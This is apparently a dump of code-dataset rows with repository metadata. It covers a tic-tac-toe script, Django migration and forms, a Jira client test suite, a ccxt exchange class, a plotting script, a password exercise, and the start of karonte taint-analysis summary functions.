cpumove(cpu, user, board)
drawboard(board)
while True:
usermove(user, board)
drawboard(board)
if checkwin(board, user.weapon):
user.won = True
break
if checktie(board):
break
cpumove(cpu, user, board)
drawboard(board)
if checkwin(board, cpu.weapon):
cpu.won = True
break
if checktie(board):
break
'''
Lines below is the entry point of the script
'''
if __name__ == '__main__':
main()
'''End of Code'''
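`getwnumber` above enumerates all eight winning lines by hand across 24 `elif` branches. The same check can be table-driven by listing the lines once; this is a sketch, equivalent when a single winning/blocking cell exists, though its branch order differs from the original:

```python
LINES = [(1, 2, 3), (4, 5, 6), (7, 8, 9),   # rows
         (1, 5, 9), (3, 5, 7),              # diagonals
         (1, 4, 7), (2, 5, 8), (3, 6, 9)]   # columns

def winning_cell(mine, taken):
    # If we hold two cells of a line and the third is unclaimed,
    # return that third cell; otherwise -2, like getwnumber above.
    for line in LINES:
        for missing in line:
            rest = [c for c in line if c != missing]
            if all(c in mine for c in rest) and missing not in taken:
                return missing
    return -2
```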
| 22.688776 | 92 | 0.616483 | 1,461 | 8,894 | 3.739904 | 0.207392 | 0.035139 | 0.035139 | 0.048316 | 0.329978 | 0.291362 | 0.253843 | 0.198939 | 0.129026 | 0.110725 | 0 | 0.027269 | 0.245446 | 8,894 | 391 | 93 | 22.746803 | 0.786917 | 0.029571 | 0 | 0.304933 | 0 | 0 | 0.069312 | 0.004696 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.004484 | null | null | 0.049327 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
aa063c8fe24a2414d08f79391cfa01c347db328a | 655 | py | Python | sitewebapp/migrations/0014_auto_20210130_0425.py | deucaleon18/debsoc-nitdgp-website | 41bd6ade7f4af143ef34aff01848f830cc533add | [
"MIT"
] | 2 | 2020-12-05T05:34:56.000Z | 2020-12-09T10:27:43.000Z | sitewebapp/migrations/0014_auto_20210130_0425.py | deucaleon18/debsoc-nitdgp-website | 41bd6ade7f4af143ef34aff01848f830cc533add | [
"MIT"
] | 3 | 2021-06-28T16:47:23.000Z | 2021-06-28T16:48:51.000Z | sitewebapp/migrations/0014_auto_20210130_0425.py | deucaleon18/debsoc-nitdgp-website | 41bd6ade7f4af143ef34aff01848f830cc533add | [
"MIT"
] | 9 | 2021-01-29T17:06:30.000Z | 2021-08-21T18:23:26.000Z | # Generated by Django 2.2.15 on 2021-01-29 22:55
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('sitewebapp', '0013_auto_20210130_0409'),
]
operations = [
migrations.RemoveField(
model_name='auditionrounds',
name='candidate',
),
migrations.AddField(
model_name='auditionrounds',
name='candidate',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='candidates', to='sitewebapp.Candidates'),
),
]
| 27.291667 | 159 | 0.638168 | 68 | 655 | 6.044118 | 0.617647 | 0.058394 | 0.068127 | 0.107056 | 0.175182 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064777 | 0.245802 | 655 | 23 | 160 | 28.478261 | 0.767206 | 0.070229 | 0 | 0.352941 | 1 | 0 | 0.181219 | 0.072488 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.117647 | 0 | 0.294118 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
aa07eb294a968be138419270910fe3769b70aebc | 2,464 | py | Python | scripts/plot/klt_track_length.py | raphaelchang/omni_slam_eval | 7df7d76c520c1325ac4f1a85f87b7af07d9628c3 | [
"MIT"
] | 7 | 2020-06-15T01:04:10.000Z | 2021-12-15T03:49:05.000Z | scripts/plot/klt_track_length.py | raphaelchang/omni_slam_eval | 7df7d76c520c1325ac4f1a85f87b7af07d9628c3 | [
"MIT"
] | null | null | null | scripts/plot/klt_track_length.py | raphaelchang/omni_slam_eval | 7df7d76c520c1325ac4f1a85f87b7af07d9628c3 | [
"MIT"
] | 4 | 2020-06-15T16:02:12.000Z | 2021-10-12T07:18:47.000Z | import h5py
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import pandas
import os
from parse import parse
import argparse
parser = argparse.ArgumentParser(description='Plot tracking evaluation results')
parser.add_argument('results_path', help='tracking results file or working directory')
args = parser.parse_args()
sns.set()
fovs = []
for yaml in os.listdir(args.results_path):
if not os.path.isdir(os.path.join(args.results_path, yaml)) and yaml.endswith('.yaml'):
fov = os.path.splitext(os.path.basename(yaml))[0]
fovs.append(fov)
fovs.sort(key=int)
motion_map = {'yaw': 'Yaw/pitch', 'roll': 'Roll', 'strafe_side': 'Sideways translate', 'strafe_forward': 'Forward translate', 'strafe_back': 'Backward translate', 'composite': 'Composite'}
df = pandas.DataFrame()
for motion in os.listdir(args.results_path):
if os.path.isdir(os.path.join(args.results_path, motion)):
bag_dir = os.path.join(args.results_path, motion)
for fovstr in fovs:
            track_lengths = np.empty(shape=(1, 0))
            file_exists = False
for filename in os.listdir(bag_dir):
if filename.split('.')[1] == fovstr and filename.endswith('.tracking.hdf5'):
results_file = os.path.join(bag_dir, filename)
with h5py.File(results_file, 'r') as f:
attrs = dict(f['attributes'].attrs.items())
rate = int(attrs['rate'])
if rate > 1:
continue
tl = f['track_lengths'][:]
track_lengths = np.hstack((track_lengths, tl[:, tl[0, :] > 2]))
file_exists = True
if file_exists:
if motion in motion_map:
motion = motion_map[motion]
df = df.append(pandas.DataFrame({'Motion': motion, 'FOV': [fovstr for i in range(len(track_lengths[0]))], 'Track lifetime (frames)': track_lengths[0, :]}))
latex = ''
for _, motion in motion_map.iteritems():
latex += motion
for fov in fovs:
latex += ' & '
rows = df.loc[(df['Motion'] == motion) & (df['FOV'] == fov)]
latex += '{} & {:.2f} & {:.2f} & {:.2f} & {:.2f} \\\\'.format(fov, rows['Track lifetime (frames)'].mean(), rows['Track lifetime (frames)'].median(), rows['Track lifetime (frames)'].quantile(0.75), rows['Track lifetime (frames)'].std())
print latex
latex = ''
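Each LaTeX row above interpolates four statistics with `{:.2f}`; a small helper showing the formatting in isolation (the function name is mine; the doubled backslashes in source produce the LaTeX row terminator `\\`):

```python
def latex_row(fov, stats):
    # stats: (mean, median, 75th percentile, std), as in the loop above.
    return '{} & {:.2f} & {:.2f} & {:.2f} & {:.2f} \\\\'.format(fov, *stats)
```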
| 44 | 243 | 0.590909 | 309 | 2,464 | 4.618123 | 0.349515 | 0.033637 | 0.052558 | 0.064471 | 0.115627 | 0.115627 | 0.115627 | 0.050456 | 0.050456 | 0 | 0 | 0.010377 | 0.256899 | 2,464 | 55 | 244 | 44.8 | 0.768979 | 0 | 0 | 0.040816 | 0 | 0 | 0.178571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.163265 | null | null | 0.020408 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
aa081249580e88b0253e91416aa676f87663a26d | 4,166 | py | Python | jtlib/test_client.py | bminard/jtlib | 0d3d83308bc4ed67bdf1732e5b0602eb8c48f53f | [
"BSD-2-Clause"
] | null | null | null | jtlib/test_client.py | bminard/jtlib | 0d3d83308bc4ed67bdf1732e5b0602eb8c48f53f | [
"BSD-2-Clause"
] | null | null | null | jtlib/test_client.py | bminard/jtlib | 0d3d83308bc4ed67bdf1732e5b0602eb8c48f53f | [
"BSD-2-Clause"
] | null | null | null | # -*-coding:Utf-8 -*
#--------------------------------------------------------------------------------
# jtlib: test_client.py
#
# jtlib module client test code.
#--------------------------------------------------------------------------------
# BSD 2-Clause License
#
# Copyright (c) 2018, Brian Minard
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#--------------------------------------------------------------------------------
import jtlib.client as client
import pytest
import re
@pytest.fixture(scope = 'session')
def timeout():
"""Time out for HTTP/HTTPS connections."""
return 5.0 # seconds; see http://docs.python-requests.org/en/master/user/quickstart/#timeouts
def test_client_without_url_argument(timeout):
"""Check client when no server URL argument is provided.
In most cases, this is going to look for a Jira server on the local host.
"""
with pytest.raises(client.InvalidUrl) as excinfo:
client.Jira(str(), timeout=timeout)
def test_client_with_invalid_url_argument(timeout):
"""Check client when an invalid server URL argument is provided."""
with pytest.raises(client.InvalidUrl) as excinfo:
client.Jira('https://www.example.com', timeout=timeout)
def test_client_with_valid_url_argument():
"""Check client when an invalid server URL argument is provided."""
client.Jira('https://jira.atlassian.com')
@pytest.fixture(scope = 'module')
def the_client():
"""Return a usable JIRA client."""
return client.Jira('https://jira.atlassian.com')
@pytest.fixture(scope = 'session')
def project_key_regex():
"""Regular expression for project key."""
return re.compile(r"""^[A-Z][A-Z]+$""") # Default project key for JIRA Server 7.1.
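The default project-key pattern used by the fixture above accepts two or more uppercase letters. A quick check of what it matches (the wrapper function is mine):

```python
import re

PROJECT_KEY = re.compile(r"""^[A-Z][A-Z]+$""")

def is_project_key(s):
    # True for two-or-more uppercase ASCII letters, nothing else.
    return PROJECT_KEY.match(s) is not None
```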
def test_client_projects_method(the_client, project_key_regex):
"""Check the projects method."""
projects = the_client.projects()
assert isinstance(projects, list)
for project in projects:
assert project_key_regex.match(project.key)
def test_client_issue_method(the_client):
issue = the_client.issue('CLOUD-10000')
assert 'CLOUD-10000' in issue.key
def test_client_search_method(the_client):
page_count = 0
for issue in the_client.search('PROJECT = CLOUD'):
if page_count > (client.Jira.maximum_search_results + 1): # Retrieve two pages of issues.
break
page_count += 1
assert page_count > 0, "JIRA project has too few issues to test search algorithm."
| 37.196429 | 97 | 0.694911 | 555 | 4,166 | 5.122523 | 0.363964 | 0.038692 | 0.036581 | 0.033415 | 0.365811 | 0.335561 | 0.334154 | 0.334154 | 0.334154 | 0.299683 | 0 | 0.006855 | 0.159626 | 4,166 | 111 | 98 | 37.531532 | 0.805199 | 0.544167 | 0 | 0.341463 | 0 | 0 | 0.124378 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 1 | 0.268293 | false | 0 | 0.073171 | 0 | 0.414634 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
aa0908d204cc1bd792f22cb281757498ea7ff6d8 | 129 | py | Python | coop/guide/context_processors.py | jalibras/coop | cb94560eb4a25eca3e241551e01eea6e3d4e3b6b | [
"Apache-2.0"
] | 1 | 2017-01-16T10:51:15.000Z | 2017-01-16T10:51:15.000Z | coop/guide/context_processors.py | jalibras/coop | cb94560eb4a25eca3e241551e01eea6e3d4e3b6b | [
"Apache-2.0"
] | null | null | null | coop/guide/context_processors.py | jalibras/coop | cb94560eb4a25eca3e241551e01eea6e3d4e3b6b | [
"Apache-2.0"
] | null | null | null |
from guide.models import Area
def nav(request):
areas = Area.objects.all()
return {
        'areas': areas,
}
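A context processor only runs if it is listed in the template engine settings; a sketch of the registration (paths other than `guide.context_processors.nav` are illustrative):

```python
# settings.py (fragment) -- register the processor so every template
# rendered with a RequestContext gets the 'areas' variable from nav().
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.request',
                'guide.context_processors.nav',
            ],
        },
    },
]
```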
| 11.727273 | 30 | 0.565891 | 15 | 129 | 4.866667 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.317829 | 129 | 10 | 31 | 12.9 | 0.829545 | 0 | 0 | 0 | 0 | 0 | 0.039683 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
aa0bad3348ebb20b51fc55cdea73057560ae7c2d | 1,009 | py | Python | python/ccxt/async_support/bitmax.py | mariuszskon/ccxt | 13253de7346e33cd384f79abf7dfb64dcbfdc35f | [
"MIT"
] | 4 | 2021-09-24T09:18:36.000Z | 2022-03-15T16:47:09.000Z | python/ccxt/async_support/bitmax.py | mariuszskon/ccxt | 13253de7346e33cd384f79abf7dfb64dcbfdc35f | [
"MIT"
] | 1 | 2017-10-28T14:35:08.000Z | 2017-10-28T14:35:08.000Z | python/ccxt/async_support/bitmax.py | mariuszskon/ccxt | 13253de7346e33cd384f79abf7dfb64dcbfdc35f | [
"MIT"
] | 3 | 2018-10-17T09:29:29.000Z | 2019-03-12T09:18:42.000Z | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async_support.ascendex import ascendex
class bitmax(ascendex):
def describe(self):
return self.deep_extend(super(bitmax, self).describe(), {
'id': 'bitmax',
'name': 'BitMax',
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/66820319-19710880-ef49-11e9-8fbe-16be62a11992.jpg',
'api': 'https://bitmax.io',
'test': 'https://bitmax-test.io',
'www': 'https://bitmax.io',
'doc': [
'https://bitmax-exchange.github.io/bitmax-pro-api/#bitmax-pro-api-documentation',
],
'fees': 'https://bitmax.io/#/feeRate/tradeRate',
'referral': 'https://bitmax.io/#/register?inviteCode=EL6BXBQM',
},
})
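The subclass above relies on `deep_extend()` to merge its overrides into the parent `describe()` dictionary. ccxt ships its own implementation; this standalone version is only a sketch of the merge semantics (nested dicts merge recursively, later scalar values win):

```python
def deep_extend(*mappings):
    # Merge dicts left to right; nested dicts merge recursively,
    # later scalar values overwrite earlier ones.
    result = {}
    for m in mappings:
        for key, value in m.items():
            if isinstance(value, dict) and isinstance(result.get(key), dict):
                result[key] = deep_extend(result[key], value)
            else:
                result[key] = value
    return result
```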
| 37.37037 | 126 | 0.557978 | 108 | 1,009 | 5.194444 | 0.666667 | 0.117647 | 0.092692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.05472 | 0.27552 | 1,009 | 26 | 127 | 38.807692 | 0.712722 | 0.169475 | 0 | 0 | 1 | 0.111111 | 0.442977 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.055556 | 0.055556 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
aa0d8ce33a090f902ad8f14cf64f48b5d4df3194 | 7,232 | py | Python | users/forms.py | henryyang42/NTHUOJ_web | b197ef8555aaf90cba176eba61da5c919dab7af6 | [
"MIT"
] | null | null | null | users/forms.py | henryyang42/NTHUOJ_web | b197ef8555aaf90cba176eba61da5c919dab7af6 | [
"MIT"
] | null | null | null | users/forms.py | henryyang42/NTHUOJ_web | b197ef8555aaf90cba176eba61da5c919dab7af6 | [
"MIT"
] | null | null | null | """
The MIT License (MIT)
Copyright (c) 2014 NTHUOJ team
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from django import forms
from threading import Thread
from users.models import User
from problem.models import Problem, Submission, SubmissionDetail, Testcase
from utils import log_info, user_info, config_info, file_info
logger = log_info.get_logger()
class CodeSubmitForm(forms.Form):
SUBMIT_PATH = config_info.get_config('path', 'submission_code_path')
LANGUAGE_CHOICE = tuple(config_info.get_config_items('compiler_option'))
BACKEND_VERSION = config_info.get_config('system_version', 'backend')
GCC_VERSION = config_info.get_config('system_version', 'gcc')
GPP_VERSION = config_info.get_config('system_version', 'gpp')
pid = forms.CharField(label='Problem ID')
language = forms.ChoiceField(choices=LANGUAGE_CHOICE, initial=Submission.CPP,
help_text="Backend: %s<br>gcc: %s<br>g++: %s"
% (BACKEND_VERSION, GCC_VERSION, GPP_VERSION))
code = forms.CharField(max_length=40 * 1024,
widget=forms.Textarea(attrs={'id': 'code_editor'}))
def clean_pid(self):
pid = self.cleaned_data['pid']
if not unicode(pid).isnumeric():
raise forms.ValidationError("Problem ID must be a number")
try:
problem = Problem.objects.get(id=pid)
if not user_info.has_problem_auth(self.user, problem):
raise forms.ValidationError(
"You don't have permission to submit that problem")
except Problem.DoesNotExist:
logger.warning('Pid %s doe not exist' % pid)
raise forms.ValidationError('Problem of this pid does not exist')
return pid
def submit(self):
pid = self.cleaned_data['pid']
code = self.cleaned_data['code']
language = self.cleaned_data['language']
problem = Problem.objects.get(id=pid)
problem.total_submission += 1
problem.save()
submission = Submission.objects.create(
user=self.user,
problem=problem,
language=language)
try:
filename = '%s.%s' % (
submission.id, file_info.get_extension(submission.language))
            with open('%s%s' % (self.SUBMIT_PATH, filename), 'w') as f:
                f.write(code.encode('utf-8'))
except IOError:
logger.warning('Sid %s fail to save code' % submission.id)
if problem.judge_source == Problem.OTHER:
# Send to other judge
pass
def __init__(self, *args, **kwargs):
self.user = kwargs.pop('user', User())
super(CodeSubmitForm, self).__init__(*args, **kwargs)
class UserProfileForm(forms.ModelForm):
"""A form for updating user's profile. Includes all the required
fields, plus a repeated password."""
username = forms.CharField(label='Username',
widget=forms.TextInput(attrs={'readonly': True}))
email = forms.EmailField(label='Email')
theme = forms.ChoiceField(label='Theme', choices=User.THEME_CHOICE)
password1 = forms.CharField(label='Password', required=False,
widget=forms.PasswordInput())
password2 = forms.CharField(label='Password Confirmation', required=False,
widget=forms.PasswordInput())
class Meta:
model = User
fields = ('username', 'email', 'theme', 'password1', 'password2')
def clean_username(self):
# username is primary key, should not be changed
instance = getattr(self, 'instance', None)
if instance and instance.pk:
return instance.username
else:
return self.cleaned_data['username']
def clean_password2(self):
# Check that the two password entries match
password1 = self.cleaned_data.get("password1")
password2 = self.cleaned_data.get("password2")
if password1 and password2 and password1 != password2:
raise forms.ValidationError("Passwords don't match")
if (not password1) != (not password2):
            raise forms.ValidationError("Please fill in both password fields")
return password2
def save(self):
if self.cleaned_data["password1"]:
self.instance.set_password(self.cleaned_data["password1"])
self.instance.save()
return self.instance
class UserLevelForm(forms.ModelForm):
"""A form for updating user's userlevel."""
def __init__(self, *args, **kwargs):
request_user = kwargs.pop('request_user', User())
super(UserLevelForm, self).__init__(*args, **kwargs)
self.fields['user_level'].label = 'User Level'
# Admin can have all choices, which is the default
if request_user.has_admin_auth():
return
# Judge can only promote a user to these levels
if request_user.has_judge_auth():
self.fields['user_level'].choices = (
(User.SUB_JUDGE, 'Sub-judge'), (User.USER, 'User'))
class Meta:
model = User
fields = ('user_level',)
def is_valid(self, user):
# run the parent validation first
valid = super(UserLevelForm, self).is_valid()
# we're done now if not valid
if not valid:
return valid
# admin can change user to all levels
if user.has_admin_auth():
return True
# judge can change user to sub-judge, user
user_level = self.cleaned_data['user_level']
if user.has_judge_auth() and \
(user_level == User.SUB_JUDGE or user_level == User.USER):
return True
return False
class UserForgetPasswordForm(forms.Form):
username = forms.CharField()
email = forms.EmailField()
def clean_email(self):
# Check that if username and email match or not
username = self.cleaned_data['username']
email = self.cleaned_data['email']
        if username and email and User.objects.filter(username=username, email=email).exists():
return email
raise forms.ValidationError("Username and Email don't match")
| 39.304348 | 86 | 0.648921 | 891 | 7,232 | 5.154882 | 0.306397 | 0.028739 | 0.03919 | 0.020684 | 0.143915 | 0.079904 | 0.040714 | 0.015241 | 0 | 0 | 0 | 0.005568 | 0.254978 | 7,232 | 183 | 87 | 39.519126 | 0.846882 | 0.221239 | 0 | 0.134454 | 0 | 0 | 0.115337 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.07563 | false | 0.142857 | 0.042017 | 0 | 0.386555 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
aa110cd2edc58ec667902045505d003d64be93a9 | 1,067 | py | Python | pset_challenging_ext/exercises/p18.py | mottaquikarim/pydev-psets | 9749e0d216ee0a5c586d0d3013ef481cc21dee27 | [
"MIT"
] | 5 | 2019-04-08T20:05:37.000Z | 2019-12-04T20:48:45.000Z | pset_challenging_ext/exercises/p18.py | mottaquikarim/pydev-psets | 9749e0d216ee0a5c586d0d3013ef481cc21dee27 | [
"MIT"
] | 8 | 2019-04-15T15:16:05.000Z | 2022-02-12T10:33:32.000Z | pset_challenging_ext/exercises/p18.py | mottaquikarim/pydev-psets | 9749e0d216ee0a5c586d0d3013ef481cc21dee27 | [
"MIT"
] | 2 | 2019-04-10T00:14:42.000Z | 2020-02-26T20:35:21.000Z | """
A website requires the users to input username and password to register. Write a program to check the validity of password input by users.
"""
"""Question 18
Level 3
Question:
A website requires the users to input username and password to register. Write a program to check the validity of password input by users.
Following are the criteria for checking the password:
1. At least 1 letter between [a-z]
2. At least 1 number between [0-9]
3. At least 1 letter between [A-Z]
4. At least 1 character from [$#@]
5. Minimum length of transaction password: 6
6. Maximum length of transaction password: 12
Your program should accept a sequence of comma separated passwords and will check them according to the above criteria. Passwords that match the criteria are to be printed, each separated by a comma.
Example
If the following passwords are given as input to the program:
ABd1234@1,a F1#,2w3E*,2We3345
Then, the output of the program should be:
ABd1234@1
Hints:
In case of input data being supplied to the question, it should be assumed to be a console input.
""" | 42.68 | 199 | 0.776007 | 186 | 1,067 | 4.451613 | 0.435484 | 0.033816 | 0.038647 | 0.045894 | 0.330918 | 0.330918 | 0.330918 | 0.330918 | 0.272947 | 0.272947 | 0 | 0.040724 | 0.171509 | 1,067 | 25 | 200 | 42.68 | 0.895928 | 0.129335 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
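A sketch solution for the exercise above (hypothetical — the pset ships this file without one), checking each criterion with `re`:

```python
import re

def valid_passwords(csv_passwords):
    """Return the comma-separated subset of passwords meeting all criteria."""
    checks = [
        r'[a-z]',   # at least one lowercase letter
        r'[A-Z]',   # at least one uppercase letter
        r'[0-9]',   # at least one digit
        r'[$#@]',   # at least one special character
    ]
    good = [p for p in csv_passwords.split(',')
            if 6 <= len(p) <= 12 and all(re.search(c, p) for c in checks)]
    return ','.join(good)

print(valid_passwords("ABd1234@1,a F1#,2w3E*,2We3345"))  # ABd1234@1
```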
aa11a5a6d1a64b23db22e2fa37320c9cd8481f08 | 14,561 | py | Python | tool/taint_analysis/summary_functions.py | cpbscholten/karonte | b989f7dfe9dbe002dd0dc4c4e5b0293dde61ae72 | [
"BSD-2-Clause"
] | 294 | 2019-11-14T13:14:55.000Z | 2022-03-22T08:28:56.000Z | tool/taint_analysis/summary_functions.py | cpbscholten/karonte | b989f7dfe9dbe002dd0dc4c4e5b0293dde61ae72 | [
"BSD-2-Clause"
] | 17 | 2019-12-23T09:32:00.000Z | 2022-03-17T20:00:13.000Z | tool/taint_analysis/summary_functions.py | cpbscholten/karonte | b989f7dfe9dbe002dd0dc4c4e5b0293dde61ae72 | [
"BSD-2-Clause"
] | 50 | 2019-11-25T02:27:04.000Z | 2021-12-10T04:46:26.000Z | """
Though karonte relies on angr's sim procedures, sometimes these add in the current state some constraints to make the
used analysis faster. For example, if a malloc has an unconstrained size, angr add the constraint
size == angr-defined.MAX_SIZE. Though this makes the analysis faster, it makes impossible to reason about the maximum
buffer sizes (as needed by karonte).
In this module we wrap sim procedures to avoid them to add such constraints.
Note however, that the semantic of an expression might get lost.
Eg. strlen(taint_x) = taint_y, taint_y is an unconstrained variable
"""
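The pattern described above can be shown in isolation: instead of a summary that pins a concrete value (and hence adds a constraint), return a fresh, unconstrained symbol. A minimal stand-in sketch — the `Sym` class below is hypothetical; karonte itself uses claripy bitvectors through angr:

```python
import itertools

_fresh = itertools.count()

class Sym:
    """Stand-in for an unconstrained symbolic value (claripy.BVS in angr)."""
    def __init__(self, name):
        self.name = '%s_%d' % (name, next(_fresh))
    def __repr__(self):
        return self.name

def summarized_strlen(tainted_buf):
    # A stock strlen model would walk the buffer and constrain its length;
    # the summaries below instead hand back a free symbol, so reasoning
    # about maximum buffer sizes remains possible: strlen(taint_x) = taint_y.
    return Sym('taint_strlen')
```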
from taint_analysis.coretaint import *
def _get_function_name(addr, p):
"""
Return a function name
:param addr: function address
:param p: angr project
:return: function name
"""
return p.loader.find_plt_stub_name(addr)
def source_dummy(*_, **__):
pass
def memcmp_unsized(_core, _, plt_path):
"""
memcmp-like unsized (e.g., strlen) function summary
:param _core: core taint engine
:param _: not used
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
dst_reg = arg_reg_name(p, 0)
src_reg = arg_reg_name(p, 1)
b1 = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, dst_reg))
b2 = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, src_reg))
if not _core.is_tainted(b1, plt_path):
b1 = None
if not _core.is_tainted(b2, plt_path):
b2 = None
# if either of the two is not tainted, we untaint the other
if b1 is not None and b2 is None:
_core.do_recursive_untaint(b1, plt_path)
elif b2 is not None and b1 is None:
_core.do_recursive_untaint(b2, plt_path)
# step into it
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "memcmp_unsized: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
def memcmp_sized(_core, _, plt_path):
"""
memcmp-like sized (e.g., memcmp) function summary
:param _core: core taint engine
:param _: not used
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
dst_reg = arg_reg_name(p, 0)
src_reg = arg_reg_name(p, 1)
reg_n = arg_reg_name(p, 2)
b1 = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, dst_reg))
b2 = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, src_reg))
n = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, reg_n))
# we untaint buffers only if n is not tainted
if not _core.is_tainted(n, plt_path):
if not _core.is_tainted(b1, plt_path):
b1 = None
if not _core.is_tainted(b2, plt_path):
b2 = None
